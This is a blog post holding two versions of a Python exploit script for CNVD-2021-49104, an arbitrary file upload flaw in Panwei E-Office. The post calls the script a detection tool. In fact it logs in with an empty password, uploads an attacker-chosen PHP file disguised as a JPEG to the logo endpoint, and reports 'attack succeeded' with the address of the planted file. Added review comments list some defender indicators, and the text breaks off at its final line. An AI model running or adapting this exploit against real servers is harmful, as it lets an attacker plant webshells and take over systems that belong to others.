A detection script for CNVD-2021-49104 that I wrote myself; anyone who needs it is welcome to take a look.
If you are interested in reproducing the vulnerability, see: CNVD-2021-49104 vulnerability reproduction (Panwei E-Office file upload vulnerability)_dreamthe's Blog-CSDN Blog
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/5 0005 15:54
import requests
from requests_toolbelt import MultipartEncoder
import sys
# Default request headers sent with every request; the values describe a
# desktop Firefox 94 browser.
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
# Both HTTP and HTTPS traffic is routed through a proxy on 127.0.0.1:8080,
# presumably a local intercepting proxy used to inspect the requests; the
# requests are expected to fail if nothing is listening on that port.
# NOTE(review): the original comment reads "code address and port"; it most
# likely means "proxy address and port".
proxies = {
"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"
}
def cookieTest(url, headers, proxies):
    """Send the login request and return one cookie pair from the response.

    The form data is the module-level dict ``d1``, which is only defined when
    the file is run as a script (it is built in the ``__main__`` block).

    Args:
        url: Base URL of the E-Office instance; the login path is appended.
        headers: Request headers to send.
        proxies: Proxy mapping handed to ``requests``.

    Returns:
        The third comma-separated entry of the ``Set-Cookie`` response header,
        cut at the first ``;`` and stripped. The original author's comment
        describes this value as the PHPSESSID pair. ``None`` is returned
        (after printing the exception) when the request or the parsing fails.
    """
    login_endpoint = url + '/login-new/logincheck.php'
    try:
        response = requests.post(login_endpoint, headers=headers, proxies=proxies, data=d1)
        # NOTE(review): this depends on the exact layout of the Set-Cookie
        # header. A response with fewer than three comma-separated entries
        # raises IndexError, which is caught and printed below.
        cookie_entries = response.headers["Set-Cookie"].split(',')
        name_value, _, _ = cookie_entries[2].partition(';')
        return name_value.strip()
    except Exception as e:
        # Any failure is only reported; the caller then receives None.
        print(e)
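def uploadTest(url, headers,file_name, file_path):
    """Send the multipart upload request used by the CNVD-2021-49104 check.

    The local file is posted as the ``Filedata`` field, declared as
    ``image/jpeg``, to the ``UploadFile.php`` logo-upload endpoint. On an
    HTTP 200 reply the response body is printed together with the URL where
    the uploaded logo file would be reachable.

    For defenders, the two paths used here are the observable indicators:
    POST requests to ``/general/index/UploadFile.php`` with
    ``uploadType=eoffice_logo`` in the access log, and an unexpected
    ``logo-eoffice.php`` under ``/images/logo/`` on disk.

    NOTE(review): a 200 status only shows that the endpoint answered. It does
    not prove the file was stored, so the printed message should be treated
    as an indicator to verify, not as confirmation.

    Args:
        url: Base URL of the E-Office instance.
        headers: Request headers, including the session cookie. A copy is
            used, so the caller's dict is left untouched.
        file_name: File name announced in the multipart body.
        file_path: Path of the local file to send.

    Raises:
        OSError: If ``file_path`` cannot be opened (raised before the
            request is attempted, as in the original).
    """
    upload_url = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
    url3 = "/images/logo/logo-eoffice.php"
    # Work on a copy so the shared header dict is not modified as a side effect.
    request_headers = dict(headers)
    # The encoder reads from the handle while the request is being sent, so
    # the request must happen inside the ``with`` block. The context manager
    # then closes the file, which the original never did.
    with open(file_path, 'rb') as upload_file:
        m = MultipartEncoder(
            fields={
                'Filedata': (file_name, upload_file, 'image/jpeg')
            })
        # The multipart boundary is part of the content type.
        request_headers['Content-Type'] = m.content_type
        try:
            # ``proxies`` is the module-level mapping; it is not a parameter.
            r2 = requests.post(upload_url, headers=request_headers, proxies=proxies, data=m)
            if r2.status_code == 200:
                print(r2.text + '攻击成功可以访问文件上传地址:'+url+url3)
        except Exception as e:
            print(e)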
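if __name__ == '__main__':
    # Two positional arguments are required: the base URL and the login name.
    # Without this guard a missing argument ends in a bare IndexError.
    if len(sys.argv) < 3:
        sys.exit('usage: ' + sys.argv[0] + ' <url> <username>')
    url = sys.argv[1]
    name = sys.argv[2]
    # Login form read by cookieTest() as a module-level global. Password and
    # captcha fields are sent empty, so a login POST with an empty PASSWORD
    # is what this check looks like in server-side logs.
    d1 = {'USERNAME': name, 'PASSWORD': '', "USER_LANG": 'cn', 'VERIFY': ''}
    # Example base URL from the author's lab: "http://win-08mtfbul1kp:8082"
    # File name announced in the upload request.
    file_name = 'test.php'
    # Path of the local file to upload; adjust it to where the file is stored.
    file_path = 'F:\\PycharmProjects\\test.php'
    # Log in and keep the extracted cookie pair (None if the login step failed).
    ck3 = cookieTest(url, headers, proxies)
    # Attach the cookie to the shared request headers.
    headers['Cookie'] = ck3
    # Send the upload request with the chosen file.
    uploadTest(url, headers,file_name, file_path)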
Notes:
The original code has been optimized; the revised version follows for reference.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/5 0005 15:54
import requests
from requests_toolbelt import MultipartEncoder
import argparse
def options():
    """Parse the command line and return ``(username, file_path, file_name, url)``.

    Recognised options:
        -s / --user     login account name
        -p / --path     path of the local file to upload
        -n / --name     file name to send with the upload
        -u / --url      base URL to check
        -v / --version  print "<prog> 1.0" and exit

    Options that are not supplied come back as ``None``.
    """
    parser = argparse.ArgumentParser()
    # (short flag, long flag, destination attribute, help text), in the order
    # they should appear in the generated help output.
    flag_table = (
        ('-s', '--user', 'username', '登录的账号名字'),
        ('-p', '--path', 'file_path', '上传文件的路径'),
        ('-n', '--name', 'file_name', '上传的文件名字'),
        ('-u', '--url', 'url', '检测的url'),
    )
    for short_flag, long_flag, target, help_text in flag_table:
        parser.add_argument(short_flag, long_flag, dest=target, help=help_text)
    parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.0')
    parsed = parser.parse_args()
    # Hand the parsed values back to the caller as a plain tuple.
    return tuple(
        getattr(parsed, field)
        for field in ('username', 'file_path', 'file_name', 'url')
    )
# Default request headers sent with every request; the values describe a
# desktop Firefox 94 browser.
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
# Both HTTP and HTTPS traffic is routed through a proxy on 127.0.0.1:8080,
# presumably a local intercepting proxy used to inspect the requests; the
# requests are expected to fail if nothing is listening on that port.
# NOTE(review): the original comment reads "code address and port"; it most
# likely means "proxy address and port".
proxies = {
"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"
}
# Start-up banner and usage text follow.
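def usage():
    """Print the start-up banner, the tool description and an example command.

    Takes no arguments and returns ``None``; everything is written to stdout.
    """
    # Backslashes that are meant literally are written as "\\" so the strings
    # no longer contain invalid escape sequences (a SyntaxWarning on current
    # Python versions). The printed text is unchanged.
    # NOTE(review): "\7" in the second banner line is a valid octal escape and
    # prints a BEL control character, not the two characters "\7". It is kept
    # as-is to preserve the existing output; confirm what was intended.
    banner = '''
へ /|
/\7 ∠_/
/ │ / /
│ Z _,< / /`ヽ
│ ヽ / 〉
Y ` / /
イ● 、 ● ⊂⊃〈 /
() へ | \\〈
>ー 、_ ィ │ //
/ へ / ノ<| \\
ヽ_ノ (_/ │//
7 |/
>―r ̄ ̄`ー―_
'''
    print(banner)
    print('''工具描述及参数介绍:''')
    print('''检测CNVD-2021-49104(泛微E-Office文件上传漏洞)''')
    # Example invocation taken from the author's own environment.
    print('''案列展示:python "F:\\PycharmProjects\\pythonProject\\options praser.py" -u http://win-08mtfbul1kp:8082 -s admin -p F:\\PycharmProjects\\test.php -n test.php''')
    print('\n')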
def cookieTest(url, headers, proxies,username):
    """Send the login request and return one cookie pair from the response.

    The form carries the given user name with empty password and captcha
    fields, so a login POST to ``/login-new/logincheck.php`` with an empty
    ``PASSWORD`` is what this step looks like in server-side logs.

    Args:
        url: Base URL of the E-Office instance; the login path is appended.
        headers: Request headers to send.
        proxies: Proxy mapping handed to ``requests``.
        username: Account name placed in the ``USERNAME`` form field.

    Returns:
        The third comma-separated entry of the ``Set-Cookie`` response header,
        cut at the first ``;`` and stripped. The original author's comment
        describes this value as the PHPSESSID pair. ``None`` is returned
        (after printing the exception) when the request or the parsing fails.
    """
    login_endpoint = url + '/login-new/logincheck.php'
    login_form = {'USERNAME': username, 'PASSWORD': '', "USER_LANG": 'cn', 'VERIFY': ''}
    try:
        response = requests.post(login_endpoint, headers=headers, proxies=proxies, data=login_form)
        # NOTE(review): the listing lost its indentation; only the message is
        # treated as conditional on the status code here. Confirm against the
        # author's file. A 200 status by itself does not prove the login
        # succeeded.
        if response.status_code == 200:
            print('登录成功,请上传脚本文件')
        # NOTE(review): depends on the exact layout of the Set-Cookie header.
        # Fewer than three comma-separated entries raises IndexError, which is
        # caught and printed below.
        raw_cookies = response.headers["Set-Cookie"]
        third_entry = raw_cookies.split(',')[2]
        return third_entry.split(';')[0].strip()
    except Exception as e:
        # Any failure is only reported; the caller then receives None.
        print(e)
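def uploadTest(url, headers,file_name, file_path):
    """Send the multipart upload request used by the CNVD-2021-49104 check.

    The local file is posted as the ``Filedata`` field, declared as
    ``image/jpeg``, to the ``UploadFile.php`` logo-upload endpoint. On an
    HTTP 200 reply the response body is printed together with the URL where
    the uploaded logo file would be reachable.

    For defenders, the two paths used here are the observable indicators:
    POST requests to ``/general/index/UploadFile.php`` with
    ``uploadType=eoffice_logo`` in the access log, and an unexpected
    ``logo-eoffice.php`` under ``/images/logo/`` on disk.

    NOTE(review): a 200 status only shows that the endpoint answered. It does
    not prove the file was stored, so the printed message should be treated
    as an indicator to verify, not as confirmation.

    Args:
        url: Base URL of the E-Office instance.
        headers: Request headers, including the session cookie. A copy is
            used, so the caller's dict is left untouched.
        file_name: File name announced in the multipart body.
        file_path: Path of the local file to send.

    Raises:
        OSError: If ``file_path`` cannot be opened (raised before the
            request is attempted, as in the original).
    """
    upload_url = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
    url3 = "/images/logo/logo-eoffice.php"
    # Work on a copy so the shared header dict is not modified as a side effect.
    request_headers = dict(headers)
    # The encoder reads from the handle while the request is being sent, so
    # the request must happen inside the ``with`` block. The context manager
    # then closes the file, which the original never did.
    with open(file_path, 'rb') as upload_file:
        m = MultipartEncoder(
            fields={
                'Filedata': (file_name, upload_file, 'image/jpeg')
            })
        # The multipart boundary is part of the content type.
        request_headers['Content-Type'] = m.content_type
        try:
            # ``proxies`` is the module-level mapping; it is not a parameter.
            r2 = requests.post(upload_url, headers=request_headers, proxies=proxies, data=m)
            if r2.status_code == 200:
                print(r2.text + '攻击成功可以访问文件上传地址:'+url+url3)
        except Exception as e:
            print(e)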
if __name__ == '__main__':
    # Always show the banner and example first.
    usage()
    username, file_path, file_name, url = options()
    # Nothing is sent unless all four options were supplied; with any of them
    # missing the script ends silently after the banner.
    if all((url, username, file_path, file_name)):
        # Log in and attach the extracted cookie pair to the shared headers
        # (cookieTest returns None if the login step failed).
        headers['Cookie'] = cookieTest(url, headers, proxies, username)
        # Send the upload request with the chosen file.
        uploadTest(url, headers, file_name, file_path)
Instructions
The following are the two request packets